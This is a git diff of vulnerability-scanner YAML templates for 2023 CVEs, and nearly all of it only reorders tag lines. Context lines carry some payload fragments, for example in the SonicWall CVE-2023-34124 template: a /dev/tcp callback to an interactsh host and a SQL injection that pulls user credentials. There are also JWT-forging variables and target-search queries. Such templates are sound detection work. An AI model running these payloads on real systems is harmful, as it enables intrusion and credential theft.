+++ b/http/cves/2023/CVE-2023-30777.yaml
@@ -29,7 +29,7 @@ info:
vendor: advancedcustomfields
product: advanced_custom_fields
framework: wordpress
- tags: wpscan,cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields
+ tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml
index 8b8bf3c5d7..4ff04a9da5 100644
--- a/http/cves/2023/CVE-2023-30868.yaml
+++ b/http/cves/2023/CVE-2023-30868.yaml
@@ -26,7 +26,7 @@ info:
vendor: cms_tree_page_view_project
product: cms_tree_page_view
framework: wordpress
- tags: wpscan,packetstorm,cve,cve2023,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project
+ tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml
index 186834ffda..50233d1005 100644
--- a/http/cves/2023/CVE-2023-31059.yaml
+++ b/http/cves/2023/CVE-2023-31059.yaml
@@ -28,7 +28,7 @@ info:
product: repetier-server
shodan-query: title:"Repetier-Server"
fofa-query: title="Repetier-Server"
- tags: cve,cve2023,repetier,lfi,repetier-server
+ tags: cve2023,cve,repetier,lfi,repetier-server
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml
index e5d1c7d2f3..a2b9366d02 100644
--- a/http/cves/2023/CVE-2023-31548.yaml
+++ b/http/cves/2023/CVE-2023-31548.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: churchcrm
product: churchcrm
- tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
+ tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml
index e03e5c39e5..49b47c36f3 100644
--- a/http/cves/2023/CVE-2023-3219.yaml
+++ b/http/cves/2023/CVE-2023-3219.yaml
@@ -29,7 +29,7 @@ info:
product: eventon
framework: wordpress
publicwww-query: "/wp-content/plugins/eventon-lite/"
- tags: wpscan,packetstorm,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon
+ tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml
index ccb5d63285..fd4cee7a30 100644
--- a/http/cves/2023/CVE-2023-32235.yaml
+++ b/http/cves/2023/CVE-2023-32235.yaml
@@ -29,7 +29,7 @@ info:
product: ghost
framework: node.js
shodan-query: http.component:"Ghost"
- tags: cve,cve2023,lfi,ghostcms,ghost,node.js
+ tags: cve2023,cve,lfi,ghostcms,ghost,node.js
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml
index 1cc37bed8b..9b56042e9f 100644
--- a/http/cves/2023/CVE-2023-32243.yaml
+++ b/http/cves/2023/CVE-2023-32243.yaml
@@ -31,7 +31,7 @@ info:
product: essential_addons_for_elementor
framework: wordpress
google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite
- tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper
+ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml
index 5aee7724ae..a5eda0c86e 100644
--- a/http/cves/2023/CVE-2023-32315.yaml
+++ b/http/cves/2023/CVE-2023-32315.yaml
@@ -27,7 +27,7 @@ info:
vendor: igniterealtime
product: "openfire"
shodan-query: title:"openfire"
- tags: cve,cve2023,auth-bypass,openfire,console,kev,igniterealtime
+ tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml
index 4b3817e0f4..eca1fff260 100644
--- a/http/cves/2023/CVE-2023-33338.yaml
+++ b/http/cves/2023/CVE-2023-33338.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: phpgurukul
product: old_age_home_management_system
- tags: cve,cve2023,oahms,sqli,auth-bypass,phpgurukul
+ tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml
index e795064cc0..859279c1e5 100644
--- a/http/cves/2023/CVE-2023-33405.yaml
+++ b/http/cves/2023/CVE-2023-33405.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: blogengine
product: blogengine.net
- tags: cve,cve2023,Blogengine,cms,redirect,blogengine
+ tags: cve2023,cve,Blogengine,cms,redirect,blogengine
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml
index 8e56092c29..5b2d7561a6 100644
--- a/http/cves/2023/CVE-2023-33440.yaml
+++ b/http/cves/2023/CVE-2023-33440.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: faculty_evaluation_system_project
product: faculty_evaluation_system
- tags: packetstorm,cve,cve2023,faculty,rce,intrusive,faculty_evaluation_system_project
+ tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml
index 3db018a6e5..0b14ca0700 100644
--- a/http/cves/2023/CVE-2023-3345.yaml
+++ b/http/cves/2023/CVE-2023-3345.yaml
@@ -29,7 +29,7 @@ info:
vendor: masteriyo
product: masteriyo
framework: wordpress
- tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo
+ tags: cve2023,cve,wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml
index 39e8c74ebb..47129ca651 100644
--- a/http/cves/2023/CVE-2023-33510.yaml
+++ b/http/cves/2023/CVE-2023-33510.yaml
@@ -29,7 +29,7 @@ info:
product: jeecg_p3_biz_chat
framework: wordpress
shodan-query: http.favicon.hash:1380908726
- tags: cve,cve2023,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress
+ tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml
index 6d0874edbb..82ddcd1315 100644
--- a/http/cves/2023/CVE-2023-33568.yaml
+++ b/http/cves/2023/CVE-2023-33568.yaml
@@ -30,7 +30,7 @@ info:
vendor: dolibarr
product: dolibarr_erp\/crm
shodan-query: http.favicon.hash:440258421
- tags: cve,cve2023,dolibarr,unauth
+ tags: cve2023,cve,dolibarr,unauth
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml
index 6b885f9303..b9417de958 100644
--- a/http/cves/2023/CVE-2023-33584.yaml
+++ b/http/cves/2023/CVE-2023-33584.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: enrollment_system_project
product: enrollment_system
- tags: packetstorm,cve,cve2023,sqli,exploitdb,unauth,enrollment,enrollment_system_project
+ tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml
index 0df752c2c9..f54853a2c9 100644
--- a/http/cves/2023/CVE-2023-33629.yaml
+++ b/http/cves/2023/CVE-2023-33629.yaml
@@ -24,7 +24,7 @@ info:
vendor: h3c
product: magic_r300-2100m_firmware
fofa-query: app="H3C-Ent-Router"
- tags: cve,cve2023,router,rce,h3c
+ tags: cve2023,cve,router,rce,h3c
variables:
filename: "{{to_lower(rand_text_alpha(7))}}"
diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml
index 07e71937f1..1a61c05135 100644
--- a/http/cves/2023/CVE-2023-3368.yaml
+++ b/http/cves/2023/CVE-2023-3368.yaml
@@ -28,7 +28,7 @@ info:
vendor: chamilo
product: chamilo
shodan-query: http.component:"Chamilo"
- tags: cve,cve2023,chamilo,unauth,cmd,rce
+ tags: cve2023,cve,chamilo,unauth,cmd,rce
http:
- method: POST
diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml
index b3deaca4d8..62cf6ff391 100644
--- a/http/cves/2023/CVE-2023-34020.yaml
+++ b/http/cves/2023/CVE-2023-34020.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/"
- tags: cve,cve2023,wordpress,uncanny-learndash-toolkit,wpscan,redirect
+ tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml
index 48cc8354f9..811a9b78b4 100644
--- a/http/cves/2023/CVE-2023-34124.yaml
+++ b/http/cves/2023/CVE-2023-34124.yaml
@@ -30,7 +30,7 @@ info:
vendor: sonicwall
product: analytics
shodan-query: http.favicon.hash:-1381126564
- tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive
+ tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive
variables:
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml
index 0ed3c11e41..d7842a81c3 100644
--- a/http/cves/2023/CVE-2023-34259.yaml
+++ b/http/cves/2023/CVE-2023-34259.yaml
@@ -28,7 +28,7 @@ info:
vendor: kyocera
product: d-copia253mf_plus_firmware
shodan-query: http.favicon.hash:-50306417
- tags: packetstorm,seclists,cve,cve2023,kyocera,lfi,printer
+ tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml
index 09ac79e066..a0c57239ee 100644
--- a/http/cves/2023/CVE-2023-34362.yaml
+++ b/http/cves/2023/CVE-2023-34362.yaml
@@ -30,7 +30,7 @@ info:
vendor: progress
product: moveit_cloud
shodan-query: http.favicon.hash:989289239
- tags: packetstorm,cve,cve2023,moveit,rce,sqli,intrusive,kev,progress
+ tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress
variables:
sessioncookie: "{{randstr}}"
diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml
index 3ac1311c9e..fdafa1ac9b 100644
--- a/http/cves/2023/CVE-2023-34537.yaml
+++ b/http/cves/2023/CVE-2023-34537.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: digitaldruid
product: hoteldruid
- tags: cve,cve2023,hoteldrui,xss,authenticated,digitaldruid
+ tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml
index ab95f734a6..ed2ca9d0d2 100644
--- a/http/cves/2023/CVE-2023-34598.yaml
+++ b/http/cves/2023/CVE-2023-34598.yaml
@@ -29,7 +29,7 @@ info:
product: "gibbon"
shodan-query: http.favicon.hash:-165631681
fofa-query: icon_hash="-165631681"
- tags: cve,cve2023,gibbon,lfi,gibbonedu
+ tags: cve2023,cve,gibbon,lfi,gibbonedu
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml
index 1857a317c4..4237d8b765 100644
--- a/http/cves/2023/CVE-2023-34599.yaml
+++ b/http/cves/2023/CVE-2023-34599.yaml
@@ -26,7 +26,7 @@ info:
vendor: gibbonedu
product: gibbon
shodan-query: http.favicon.hash:-165631681
- tags: cve,cve2023,gibbon,xss,authenticated,intrusive,gibbonedu
+ tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml
index 9f1d3c5856..502a3b7780 100644
--- a/http/cves/2023/CVE-2023-34659.yaml
+++ b/http/cves/2023/CVE-2023-34659.yaml
@@ -26,7 +26,7 @@ info:
vendor: jeecg
product: jeecg_boot
shodan-query: http.favicon.hash:1380908726
- tags: cve,cve2023,jeecg,sqli
+ tags: cve2023,cve,jeecg,sqli
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml
index 57153c0785..4f40cf505b 100644
--- a/http/cves/2023/CVE-2023-34751.yaml
+++ b/http/cves/2023/CVE-2023-34751.yaml
@@ -24,7 +24,7 @@ info:
vendor: bloofox
product: bloofoxcms
fofa-query: "Powered by bloofoxCMS"
- tags: cve,cve2023,sqli,bloofox,authenticated
+ tags: cve2023,cve,sqli,bloofox,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml
index baec900a98..a6c2e73294 100644
--- a/http/cves/2023/CVE-2023-3479.yaml
+++ b/http/cves/2023/CVE-2023-3479.yaml
@@ -28,7 +28,7 @@ info:
vendor: hestiacp
product: control_panel
shodan-query: http.favicon.hash:-476299640
- tags: huntr,cve,cve2023,hestiacp,xss,intrusive
+ tags: cve2023,cve,huntr,hestiacp,xss,intrusive
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml
index e04ca3a5fc..a4c249f5eb 100644
--- a/http/cves/2023/CVE-2023-34843.yaml
+++ b/http/cves/2023/CVE-2023-34843.yaml
@@ -26,7 +26,7 @@ info:
vendor: traggo
product: traggo
shodan-query: html:"traggo"
- tags: cve,cve2023,traggo,lfi,server
+ tags: cve2023,cve,traggo,lfi,server
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml
index a1c000aaa1..e8728c3354 100644
--- a/http/cves/2023/CVE-2023-34960.yaml
+++ b/http/cves/2023/CVE-2023-34960.yaml
@@ -30,7 +30,7 @@ info:
vendor: chamilo
product: chamilo
shodan-query: http.component:"Chamilo"
- tags: packetstorm,cve,cve2023,chamilo
+ tags: cve,cve2023,packetstorm,chamilo
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml
index 304e4b9c44..4429010821 100644
--- a/http/cves/2023/CVE-2023-35082.yaml
+++ b/http/cves/2023/CVE-2023-35082.yaml
@@ -28,7 +28,7 @@ info:
product: endpoint_manager_mobile
shodan-query: http.favicon.hash:362091310
fofa-query: icon_hash="362091310"
- tags: cve,cve2023,ivanti,mobileiron,epmm
+ tags: cve2023,cve,ivanti,mobileiron,epmm
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml
index a9e5b36004..fb66bb04f5 100644
--- a/http/cves/2023/CVE-2023-35813.yaml
+++ b/http/cves/2023/CVE-2023-35813.yaml
@@ -24,7 +24,7 @@ info:
vendor: sitecore
product: experience_commerce
shodan-query: title:"Sitecore"
- tags: cve,cve2023,sitecore,rce
+ tags: cve2023,cve,sitecore,rce
variables:
string: "{{rand_base(6)}}"
payload: |
diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml
index d312c77220..56458d4453 100644
--- a/http/cves/2023/CVE-2023-35843.yaml
+++ b/http/cves/2023/CVE-2023-35843.yaml
@@ -29,7 +29,7 @@ info:
vendor: nocodb
product: nocodb
shodan-query: http.favicon.hash:-2017596142
- tags: cve,cve2023,nocodb,lfi
+ tags: cve2023,cve,nocodb,lfi
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml
index 261ded83b5..323215da68 100644
--- a/http/cves/2023/CVE-2023-35885.yaml
+++ b/http/cves/2023/CVE-2023-35885.yaml
@@ -29,7 +29,7 @@ info:
vendor: mgt-commerce
product: cloudpanel
shodan-query: title:"Cloudpanel"
- tags: cve,cve2023,cloudpanel,rce,instrusive,mgt-commerce
+ tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce
variables:
session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
str1: "{{rand_base(10)}}"
diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml
index 835f1ed97d..d18d2f8812 100644
--- a/http/cves/2023/CVE-2023-36144.yaml
+++ b/http/cves/2023/CVE-2023-36144.yaml
@@ -25,7 +25,7 @@ info:
vendor: intelbras
product: sg_2404_mr_firmware
shodan-query: title:"Intelbras"
- tags: cve,cve2023,intelbras,switch,exposure
+ tags: cve2023,cve,intelbras,switch,exposure
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml
index 058831dc9e..b50eba3bbf 100644
--- a/http/cves/2023/CVE-2023-36287.yaml
+++ b/http/cves/2023/CVE-2023-36287.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: webkul
product: qloapps
- tags: cve,cve2023,xss,webkul-qloapps,unauth,webkul
+ tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml
index bb8dc8850a..d0f15ec5ac 100644
--- a/http/cves/2023/CVE-2023-36289.yaml
+++ b/http/cves/2023/CVE-2023-36289.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: webkul
product: qloapps
- tags: cve,cve2023,xss,webkul-qloapps,unauth,webkul
+ tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml
index 81f059effd..99d89b27bf 100644
--- a/http/cves/2023/CVE-2023-36306.yaml
+++ b/http/cves/2023/CVE-2023-36306.yaml
@@ -22,7 +22,7 @@ info:
max-request: 1
vendor: adiscon
product: loganalyzer
- tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
+ tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml
index da13af49ec..6eebcc2239 100644
--- a/http/cves/2023/CVE-2023-36346.yaml
+++ b/http/cves/2023/CVE-2023-36346.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: codekop
product: codekop
- tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth
+ tags: cve2023,cve,packetstorm,xss,pos,codekop,unauth
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml
index 9108eefadc..d77f653463 100644
--- a/http/cves/2023/CVE-2023-36844.yaml
+++ b/http/cves/2023/CVE-2023-36844.yaml
@@ -30,7 +30,7 @@ info:
vendor: juniper
product: junos
shodan-query: title:"Juniper Web Device Manager"
- tags: packetstorm,cve,cve2023,juniper,php,rce,intrusive,fileupload,kev
+ tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables:
value: "CVE-2023-36844"
payload: "('')"
diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml
index 7a01387460..09b3da08a2 100644
--- a/http/cves/2023/CVE-2023-36845.yaml
+++ b/http/cves/2023/CVE-2023-36845.yaml
@@ -28,7 +28,7 @@ info:
vendor: juniper
product: junos
shodan-query: title:"Juniper Web Device Manager"
- tags: packetstorm,cve,cve2023,rce,unauth,juniper,kev
+ tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml
index 7f78150bb0..17453e5015 100644
--- a/http/cves/2023/CVE-2023-3710.yaml
+++ b/http/cves/2023/CVE-2023-3710.yaml
@@ -26,7 +26,7 @@ info:
vendor: honeywell
product: pm43_firmware
shodan-query: http.html:"/main/login.lua?pageid="
- tags: cve,cve2023,honeywell,pm43,printer,iot,rce
+ tags: cve2023,cve,honeywell,pm43,printer,iot,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml
index 0669b6e94b..d8328cee25 100644
--- a/http/cves/2023/CVE-2023-37266.yaml
+++ b/http/cves/2023/CVE-2023-37266.yaml
@@ -27,7 +27,7 @@ info:
product: casaos
shodan-query: http.html:"/CasaOS-UI/public/index.html"
fofa-query: body="/CasaOS-UI/public/index.html"
- tags: cve,cve2023,oss,casaos,jwt,icewhale
+ tags: cve2023,cve,oss,casaos,jwt,icewhale
variables:
jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}'
jwt_token: '{{generate_jwt(jwt_data, "HS256")}}'
diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml
index 5e3354a688..3c6c403748 100644
--- a/http/cves/2023/CVE-2023-37270.yaml
+++ b/http/cves/2023/CVE-2023-37270.yaml
@@ -30,7 +30,7 @@ info:
vendor: piwigo
product: piwigo
shodan-query: http.favicon.hash:540706145
- tags: cve,cve2023,piwigo,sqli,authenticated
+ tags: cve2023,cve,piwigo,sqli,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml
index 89bdcd67b3..48030a4625 100644
--- a/http/cves/2023/CVE-2023-37462.yaml
+++ b/http/cves/2023/CVE-2023-37462.yaml
@@ -28,7 +28,7 @@ info:
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
- tags: cve,cve2023,xwiki,rce
+ tags: cve2023,cve,xwiki,rce
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml
index 890e3af93e..6985ee81af 100644
--- a/http/cves/2023/CVE-2023-37474.yaml
+++ b/http/cves/2023/CVE-2023-37474.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: copyparty_project
product: copyparty
- tags: packetstorm,cve,cve2023,traversal,copyparty,copyparty_project
+ tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml
index c6849e91f4..81d180b3c2 100644
--- a/http/cves/2023/CVE-2023-37580.yaml
+++ b/http/cves/2023/CVE-2023-37580.yaml
@@ -30,7 +30,7 @@ info:
product: zimbra
shodan-query: http.favicon.hash:475145467
fofa-query: icon_hash="475145467"
- tags: cve,cve2023,zimbra,xss,authenticated,kev
+ tags: cve2023,cve,zimbra,xss,authenticated,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml
index 8c6935563c..38e0f6b3e7 100644
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: simple_online_piggery_management_system_project
product: simple_online_piggery_management_system
- tags: cve,cve2023,fileupload,rce,opms,intrusive
+ tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml
index a815081248..3fd912dfbf 100644
--- a/http/cves/2023/CVE-2023-3765.yaml
+++ b/http/cves/2023/CVE-2023-3765.yaml
@@ -29,7 +29,7 @@ info:
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
- tags: cve,cve2023,mflow,lfi,huntr,lfprojects
+ tags: cve2023,cve,mflow,lfi,huntr,lfprojects
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml
index 2a379eee8a..3e85f063cd 100644
--- a/http/cves/2023/CVE-2023-37679.yaml
+++ b/http/cves/2023/CVE-2023-37679.yaml
@@ -25,7 +25,7 @@ info:
vendor: nextgen
product: mirth_connect
shodan-query: title:"mirth connect administrator"
- tags: cve,cve2023,nextgen,rce
+ tags: cve2023,cve,nextgen,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml
index b1321983f3..9fb739990c 100644
--- a/http/cves/2023/CVE-2023-37979.yaml
+++ b/http/cves/2023/CVE-2023-37979.yaml
@@ -28,7 +28,7 @@ info:
product: ninja_forms
framework: wordpress
publicwww-query: /wp-content/plugins/ninja-forms/
- tags: wpscan,packetstorm,cve,cve2023,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms
+ tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml
index 27805e250c..f59063fffb 100644
--- a/http/cves/2023/CVE-2023-38035.yaml
+++ b/http/cves/2023/CVE-2023-38035.yaml
@@ -30,7 +30,7 @@ info:
vendor: ivanti
product: mobileiron_sentry
shodan-query: 'html:"Note: Requires a local Sentry administrative user"'
- tags: packetstorm,cve,cve2023,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast
+ tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast
variables:
oast: "{{interactsh-url}}/?"
padstr: "{{randstr}}"
diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml
index b1bfc03904..f7cf94576a 100644
--- a/http/cves/2023/CVE-2023-38205.yaml
+++ b/http/cves/2023/CVE-2023-38205.yaml
@@ -28,7 +28,7 @@ info:
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
- tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev
+ tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml
index ed827351ae..e75356a7d3 100644
--- a/http/cves/2023/CVE-2023-3836.yaml
+++ b/http/cves/2023/CVE-2023-3836.yaml
@@ -28,7 +28,7 @@ info:
product: smart_parking_management
shodan-query: html:"/WPMS/asset"
zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce,dahuasecurity
+ tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity
variables:
random_str: "{{rand_base(6)}}"
match_str: "{{md5(random_str)}}"
diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml
index 20d10187db..f99e22338d 100644
--- a/http/cves/2023/CVE-2023-3843.yaml
+++ b/http/cves/2023/CVE-2023-3843.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: cve,cve2023,xss,unauth,exploitdb,moodating,moosocial
+ tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml
index fa77141dde..bc47a382e3 100644
--- a/http/cves/2023/CVE-2023-38433.yaml
+++ b/http/cves/2023/CVE-2023-38433.yaml
@@ -29,7 +29,7 @@ info:
product: ip-he950e_firmware
shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133'
max-req: 1
- tags: cve,cve2023,fujitsu,ip-series
+ tags: cve2023,cve,fujitsu,ip-series
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml
index e181ffa8f8..e062083750 100644
--- a/http/cves/2023/CVE-2023-3844.yaml
+++ b/http/cves/2023/CVE-2023-3844.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: moosocial
product: moodating
- tags: packetstorm,cve,cve2023,xss,moodating,moosocial
